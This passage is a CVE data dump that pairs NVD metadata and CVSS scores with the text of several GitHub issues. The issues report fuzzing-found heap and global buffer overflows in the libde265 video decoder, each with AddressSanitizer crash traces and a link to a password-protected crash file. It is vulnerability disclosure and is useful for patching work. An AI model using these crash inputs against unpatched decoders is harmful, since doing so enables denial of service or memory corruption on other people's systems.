[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/strukturag/libde265/issues/239" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5346" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/strukturag/libde265/issues/239" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5346" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:struktur:libde265:1.0.4:*:*:*:*:*:*:*", "matchCriteriaId": "4F5331C0-3C70-42CB-AC2C-4E8B7FA1328F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/strukturag/libde265/issues/239
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "strukturag", "libde265" ]
# heap-buffer-overflow in mc_luma when decoding file I found some problems during fuzzing ## Test Version dev version, git clone https://github.com/strukturag/libde265 ## Test Environment root@ubuntu:~# lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 16.04.6 LTS Release: 16.04 Codename: xenial root@ubuntu:~# uname -a Linux ubuntu 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux ## Test Configure ./configure configure: --------------------------------------- configure: Building dec265 example: yes configure: Building sherlock265 example: no configure: Building encoder: yes configure: --------------------------------------- ## Test Program `dec265 [infile]` ## Asan Output ``` root@ubuntu:~# ./dec265 libde265-mc_luma-heap_overflow.crash WARNING: pps header invalid ================================================================= ==83007==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x626000008d1a at pc 0x00000052cd7b bp 0x7ffefc0bd7e0 sp 0x7ffefc0bd7d0 READ of size 2 at 0x626000008d1a thread T0 #0 0x52cd7a in void mc_luma<unsigned short>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned short const*, int, int, int, int) /root/src/libde265/libde265/motion.cc:148 #1 0x51f594 in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*) /root/src/libde265/libde265/motion.cc:370 #2 0x52b8f9 in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int) /root/src/libde265/libde265/motion.cc:2107 #3 0x478f4a in read_prediction_unit(thread_context*, int, int, int, int, int, int, int, int, int) /root/src/libde265/libde265/slice.cc:4137 #4 0x47a704 in read_coding_unit(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4492 #5 0x47b6fe in read_coding_quadtree(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4647 #6 0x47b5ac in read_coding_quadtree(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4633 #7 0x47338a in read_coding_tree_unit(thread_context*) /root/src/libde265/libde265/slice.cc:2861 #8 0x47beb1 in decode_substream(thread_context*, bool, bool) /root/src/libde265/libde265/slice.cc:4736 #9 0x47db9f in read_slice_segment_data(thread_context*) /root/src/libde265/libde265/slice.cc:5049 #10 0x40bf17 in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) /root/src/libde265/libde265/decctx.cc:843 #11 0x40c6d7 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) /root/src/libde265/libde265/decctx.cc:945 #12 0x40b589 in decoder_context::decode_some(bool*) /root/src/libde265/libde265/decctx.cc:730 #13 0x40b2f2 in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /root/src/libde265/libde265/decctx.cc:688 #14 0x40dbb3 in decoder_context::decode_NAL(NAL_unit*) /root/src/libde265/libde265/decctx.cc:1230 #15 0x40e17b in decoder_context::decode(int*) /root/src/libde265/libde265/decctx.cc:1318 #16 0x405a61 in de265_decode /root/src/libde265/libde265/de265.cc:346 #17 0x404972 in main /root/src/libde265/dec265/dec265.cc:764 #18 0x7f5ee6c5b82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #19 0x402b28 in _start (/root/dec265+0x402b28) 0x626000008d1a is located 10 bytes to the right of 11280-byte region [0x626000006100,0x626000008d10) allocated by thread T0 here: #0 0x7f5ee7b5c076 in __interceptor_posix_memalign (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99076) #1 0x43e00d in ALLOC_ALIGNED /root/src/libde265/libde265/image.cc:54 #2 0x43e6da in de265_image_get_buffer /root/src/libde265/libde265/image.cc:128 #3 0x440639 in de265_image::alloc_image(int, int, de265_chroma, std::shared_ptr<seq_parameter_set const>, bool, decoder_context*, long, void*, bool) /root/src/libde265/libde265/image.cc:384 #4 0x43afa4 in decoded_picture_buffer::new_image(std::shared_ptr<seq_parameter_set const>, decoder_context*, long, void*, bool) /root/src/libde265/libde265/dpb.cc:262 #5 0x40ee8b in decoder_context::generate_unavailable_reference_picture(seq_parameter_set const*, int, bool) /root/src/libde265/libde265/decctx.cc:1418 #6 0x411722 in decoder_context::process_reference_picture_set(slice_segment_header*) /root/src/libde265/libde265/decctx.cc:1648 #7 0x414cc9 in decoder_context::process_slice_segment_header(slice_segment_header*, de265_error*, long, nal_header*, void*) /root/src/libde265/libde265/decctx.cc:2066 #8 0x40acad in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /root/src/libde265/libde265/decctx.cc:639 #9 0x40dbb3 in decoder_context::decode_NAL(NAL_unit*) /root/src/libde265/libde265/decctx.cc:1230 #10 0x40e17b in decoder_context::decode(int*) /root/src/libde265/libde265/decctx.cc:1318 #11 0x405a61 in de265_decode /root/src/libde265/libde265/de265.cc:346 #12 0x404972 in main /root/src/libde265/dec265/dec265.cc:764 #13 0x7f5ee6c5b82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) SUMMARY: AddressSanitizer: heap-buffer-overflow /root/src/libde265/libde265/motion.cc:148 void mc_luma<unsigned short>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned short const*, int, int, int, int) Shadow bytes around the buggy address: 0x0c4c7fff9150: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4c7fff9160: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4c7fff9170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4c7fff9180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4c7fff9190: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c4c7fff91a0: 00 00 fa[fa]fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4c7fff91b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4c7fff91c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4c7fff91d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4c7fff91e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4c7fff91f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==83007==ABORTING ``` ## POC file [libde265-mc_luma-heap_overflow.zip](https://github.com/leonzhao7/vulnerability/blob/master/libde265-mc_luma-heap_overflow.zip) password: leon.zhao.7 ## CREDIT Zhao Liang, Huawei Weiran Labs
heap-buffer-overflow in mc_luma when decoding file
https://api.github.com/repos/strukturag/libde265/issues/239/comments
2
2019-12-24T11:28:20Z
2023-01-24T18:06:05Z
https://github.com/strukturag/libde265/issues/239
542,098,946
239
2,496
CVE-2020-21596
2021-09-16T22:15:07.743
libde265 v1.0.4 contains a global buffer overflow in the decode_CABAC_bit function, which can be exploited via a crafted a file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/strukturag/libde265/issues/236" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00020.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2023/dsa-5346" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/strukturag/libde265/issues/236" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00020.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2023/dsa-5346" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:struktur:libde265:1.0.4:*:*:*:*:*:*:*", "matchCriteriaId": "4F5331C0-3C70-42CB-AC2C-4E8B7FA1328F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*", "matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/strukturag/libde265/issues/236
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "strukturag", "libde265" ]
# global buffer overflow in decode_CABAC_bit when decoding file I found some problems during fuzzing ## Test Version dev version, git clone https://github.com/strukturag/libde265 ## Test Environment root@ubuntu:~# lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 16.04.6 LTS Release: 16.04 Codename: xenial root@ubuntu:~# uname -a Linux ubuntu 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux ## Test Configure ./configure configure: --------------------------------------- configure: Building dec265 example: yes configure: Building sherlock265 example: no configure: Building encoder: yes configure: --------------------------------------- ## Test Program `dec265 [infile]` ## Asan Output ``` root@ubuntu:~# ./dec265 libde265-decode_CABAC_bit-overflow.crash WARNING: CTB outside of image area (concealing stream error...) WARNING: end_of_sub_stream_one_bit not set to 1 when it should be WARNING: slice header invalid ================================================================= ==58539==ERROR: AddressSanitizer: global-buffer-overflow on address 0x00000054625f at pc 0x0000004fc1cf bp 0x7fffa287c990 sp 0x7fffa287c980 READ of size 1 at 0x00000054625f thread T0 #0 0x4fc1ce in decode_CABAC_bit(CABAC_decoder*, context_model*) /root/src/libde265/libde265/cabac.cc:180 #1 0x46fca1 in decode_cu_skip_flag /root/src/libde265/libde265/slice.cc:1679 #2 0x4797c7 in read_coding_unit(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4289 #3 0x47b6fe in read_coding_quadtree(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4647 #4 0x47b53f in read_coding_quadtree(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4630 #5 0x47338a in read_coding_tree_unit(thread_context*) /root/src/libde265/libde265/slice.cc:2861 #6 0x47beb1 in decode_substream(thread_context*, bool, bool) /root/src/libde265/libde265/slice.cc:4736 #7 0x47db9f in read_slice_segment_data(thread_context*) /root/src/libde265/libde265/slice.cc:5049 #8 0x40bf17 in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) /root/src/libde265/libde265/decctx.cc:843 #9 0x40c6d7 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) /root/src/libde265/libde265/decctx.cc:945 #10 0x40b589 in decoder_context::decode_some(bool*) /root/src/libde265/libde265/decctx.cc:730 #11 0x40b2f2 in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /root/src/libde265/libde265/decctx.cc:688 #12 0x40dbb3 in decoder_context::decode_NAL(NAL_unit*) /root/src/libde265/libde265/decctx.cc:1230 #13 0x40e17b in decoder_context::decode(int*) /root/src/libde265/libde265/decctx.cc:1318 #14 0x405a61 in de265_decode /root/src/libde265/libde265/de265.cc:346 #15 0x404972 in main /root/src/libde265/dec265/dec265.cc:764 #16 0x7f83f76d982f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #17 0x402b28 in _start (/root/dec265+0x402b28) 0x00000054625f is located 31 bytes to the right of global variable 'next_state_MPS' defined in 'cabac.cc:112:22' (0x546200) of size 64 0x00000054625f is located 1 bytes to the left of global variable 'next_state_LPS' defined in 'cabac.cc:120:22' (0x546260) of size 64 SUMMARY: AddressSanitizer: global-buffer-overflow /root/src/libde265/libde265/cabac.cc:180 decode_CABAC_bit(CABAC_decoder*, context_model*) Shadow bytes around the buggy address: 0x0000800a0bf0: 00 00 00 01 f9 f9 f9 f9 00 00 00 00 00 02 f9 f9 0x0000800a0c00: f9 f9 f9 f9 00 00 00 00 00 00 00 00 01 f9 f9 f9 0x0000800a0c10: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00 0x0000800a0c20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0000800a0c30: 00 00 00 00 f9 f9 f9 f9 00 00 00 00 f9 f9 f9 f9 =>0x0000800a0c40: 00 00 00 00 00 00 00 00 f9 f9 f9[f9]00 00 00 00 0x0000800a0c50: 00 00 00 00 f9 f9 f9 f9 00 01 f9 f9 f9 f9 f9 f9 0x0000800a0c60: 00 04 f9 f9 f9 f9 f9 f9 00 00 00 f9 f9 f9 f9 f9 0x0000800a0c70: 00 01 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00 0x0000800a0c80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0000800a0c90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==58539==ABORTING ``` ## POC file [libde265-decode_CABAC_bit-overflow.zip](https://github.com/leonzhao7/vulnerability/blob/master/libde265-decode_CABAC_bit-overflow.zip) password: leon.zhao.7 ## CREDIT Zhao Liang, Huawei Weiran Labs
global buffer overflow in decode_CABAC_bit when decoding file
https://api.github.com/repos/strukturag/libde265/issues/236/comments
2
2019-12-24T11:22:38Z
2023-01-24T18:01:46Z
https://github.com/strukturag/libde265/issues/236
542,097,369
236
2,497
CVE-2020-21597
2021-09-16T22:15:07.793
libde265 v1.0.4 contains a heap buffer overflow in the mc_chroma function, which can be exploited via a crafted a file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/strukturag/libde265/issues/238" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00020.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2023/dsa-5346" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/strukturag/libde265/issues/238" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00020.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2023/dsa-5346" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:struktur:libde265:1.0.4:*:*:*:*:*:*:*", "matchCriteriaId": "4F5331C0-3C70-42CB-AC2C-4E8B7FA1328F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*", "matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/strukturag/libde265/issues/238
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "strukturag", "libde265" ]
# heap-buffer-overflow in mc_chroma when decoding file I found some problems during fuzzing ## Test Version dev version, git clone https://github.com/strukturag/libde265 ## Test Environment root@ubuntu:~# lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 16.04.6 LTS Release: 16.04 Codename: xenial root@ubuntu:~# uname -a Linux ubuntu 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux ## Test Configure ./configure configure: --------------------------------------- configure: Building dec265 example: yes configure: Building sherlock265 example: no configure: Building encoder: yes configure: --------------------------------------- ## Test Program `dec265 [infile]` ## Asan Output ``` root@ubuntu:~# ./dec265 libde265-mc_chroma-heap_overflow.crash WARNING: CTB outside of image area (concealing stream error...) WARNING: faulty reference picture list WARNING: slice segment address invalid WARNING: faulty reference picture list ================================================================= ==78714==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001bf10 at pc 0x00000052e002 bp 0x7ffc932b5930 sp 0x7ffc932b5920 READ of size 2 at 0x61b00001bf10 thread T0 #0 0x52e001 in void mc_chroma<unsigned short>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned short const*, int, int, int, int) /root/src/libde265/libde265/motion.cc:244 #1 0x51f88a in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*) /root/src/libde265/libde265/motion.cc:382 #2 0x52b8f9 in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int) /root/src/libde265/libde265/motion.cc:2107 #3 0x478f4a in read_prediction_unit(thread_context*, int, int, int, int, int, int, int, int, int) /root/src/libde265/libde265/slice.cc:4137 #4 0x47a704 in read_coding_unit(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4492 #5 0x47b6fe in read_coding_quadtree(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4647 #6 0x47338a in read_coding_tree_unit(thread_context*) /root/src/libde265/libde265/slice.cc:2861 #7 0x47beb1 in decode_substream(thread_context*, bool, bool) /root/src/libde265/libde265/slice.cc:4736 #8 0x47db9f in read_slice_segment_data(thread_context*) /root/src/libde265/libde265/slice.cc:5049 #9 0x40bf17 in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) /root/src/libde265/libde265/decctx.cc:843 #10 0x40c6d7 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) /root/src/libde265/libde265/decctx.cc:945 #11 0x40b589 in decoder_context::decode_some(bool*) /root/src/libde265/libde265/decctx.cc:730 #12 0x40b2f2 in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /root/src/libde265/libde265/decctx.cc:688 #13 0x40dbb3 in decoder_context::decode_NAL(NAL_unit*) /root/src/libde265/libde265/decctx.cc:1230 #14 0x40e17b in decoder_context::decode(int*) /root/src/libde265/libde265/decctx.cc:1318 #15 0x405a61 in de265_decode /root/src/libde265/libde265/de265.cc:346 #16 0x404972 in main /root/src/libde265/dec265/dec265.cc:764 #17 0x7f97d894282f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #18 0x402b28 in _start (/root/dec265+0x402b28) 0x61b00001bf10 is located 0 bytes to the right of 1424-byte region [0x61b00001b980,0x61b00001bf10) allocated by thread T0 here: #0 0x7f97d9843076 in __interceptor_posix_memalign (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99076) #1 0x43e00d in ALLOC_ALIGNED /root/src/libde265/libde265/image.cc:54 #2 0x43e725 in de265_image_get_buffer /root/src/libde265/libde265/image.cc:132 #3 0x440639 in de265_image::alloc_image(int, int, de265_chroma, std::shared_ptr<seq_parameter_set const>, bool, decoder_context*, long, void*, bool) /root/src/libde265/libde265/image.cc:384 #4 0x43afa4 in decoded_picture_buffer::new_image(std::shared_ptr<seq_parameter_set const>, decoder_context*, long, void*, bool) /root/src/libde265/libde265/dpb.cc:262 #5 0x40ee8b in decoder_context::generate_unavailable_reference_picture(seq_parameter_set const*, int, bool) /root/src/libde265/libde265/decctx.cc:1418 #6 0x411722 in decoder_context::process_reference_picture_set(slice_segment_header*) /root/src/libde265/libde265/decctx.cc:1648 #7 0x414cc9 in decoder_context::process_slice_segment_header(slice_segment_header*, de265_error*, long, nal_header*, void*) /root/src/libde265/libde265/decctx.cc:2066 #8 0x40acad in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /root/src/libde265/libde265/decctx.cc:639 #9 0x40dbb3 in decoder_context::decode_NAL(NAL_unit*) /root/src/libde265/libde265/decctx.cc:1230 #10 0x40e17b in decoder_context::decode(int*) /root/src/libde265/libde265/decctx.cc:1318 #11 0x405a61 in de265_decode /root/src/libde265/libde265/de265.cc:346 #12 0x404972 in main /root/src/libde265/dec265/dec265.cc:764 #13 0x7f97d894282f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) SUMMARY: AddressSanitizer: heap-buffer-overflow /root/src/libde265/libde265/motion.cc:244 void mc_chroma<unsigned short>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned short const*, int, int, int, int) Shadow bytes around the buggy address: 0x0c367fffb790: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c367fffb7a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c367fffb7b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c367fffb7c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c367fffb7d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c367fffb7e0: 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c367fffb7f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c367fffb800: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c367fffb810: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c367fffb820: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c367fffb830: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==78714==ABORTING ``` ## POC file [libde265-mc_chroma-heap_overflow.zip](https://github.com/leonzhao7/vulnerability/blob/master/libde265-mc_chroma-heap_overflow.zip) password: leon.zhao.7 ## CREDIT Zhao Liang, Huawei Weiran Labs
heap-buffer-overflow in mc_chroma when decoding file
https://api.github.com/repos/strukturag/libde265/issues/238/comments
4
2019-12-24T11:26:58Z
2023-01-24T18:04:53Z
https://github.com/strukturag/libde265/issues/238
542,098,570
238
2,498
CVE-2020-21598
2021-09-16T22:15:07.837
libde265 v1.0.4 contains a heap buffer overflow in the ff_hevc_put_unweighted_pred_8_sse function, which can be exploited via a crafted a file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Technical Description", "Third Party Advisory" ], "url": "https://cwe.mitre.org/data/definitions/122.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/strukturag/libde265/issues/237" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00020.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2023/dsa-5346" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Technical Description", "Third Party Advisory" ], "url": "https://cwe.mitre.org/data/definitions/122.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/strukturag/libde265/issues/237" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00020.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": 